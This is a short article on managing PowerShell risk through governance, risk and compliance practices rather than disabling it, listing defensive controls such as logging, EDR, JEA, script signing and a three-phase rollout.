PowerShell and GRC: Moving from “Disable It” to “Manage It”
For years, many security conversations have started with the idea that hackers use PowerShell so it should be disabled. In reality, PowerShell is an essential operations tool. The real task is to manage risk so that organizations can use PowerShell safely while preserving the automation and efficiency that teams depend on.
The Myth: “Hackers Use PowerShell, Disable It”
It is true that attackers abuse PowerShell. Disabling it entirely harms operational capability and often encourages workarounds that are even riskier. Mature organizations balance risks with benefits.
How Adversaries Hide: Understanding Obfuscation
Attackers commonly hide intent using hex encoding or other forms of obfuscation. By decoding these strings step by step, you uncover ordinary behavior concealed behind encoded data.
What Risk Really Means and How GRC Helps
Risk is a combination of probability and impact. GRC exists to ensure that organizations understand why a control is needed, what must be done, and what is actually happening.
Navigating Industry Frameworks Without Creating New Ones
Organizations operate within frameworks like ISO, COSO, FAIR, NIST, ITIL and COBIT. The goal is not to invent new standards but to apply existing ones consistently.
Is PowerShell Really the Issue
MITRE ATT&CK describes several techniques involving PowerShell misuse, such as T1059.001 and T1546.013.
Practical Risk Mitigations for PowerShell
- Observability through logging and EDR
- Access governance with admin tiering and JEA
- Script signing and software restriction policies
- Inbound and outbound access control
- Secret management and AppSec testing
Where to Begin: High Value Controls
Start with logging, EDR and remoting hygiene. Move next to script signing, admin tiering and software restrictions.
A Simple Three Phase Approach
Phase 1: Observe and contain
Phase 2: Establish trust
Phase 3: Institutionalize controls
ASD’s guidance on this is a great starting point for applying these concepts.
Conclusion
PowerShell is not inherently unsafe. The absence of proper governance is what creates risk. Managing PowerShell through GRC principles allows organizations to keep automation advantages while reducing attack surface.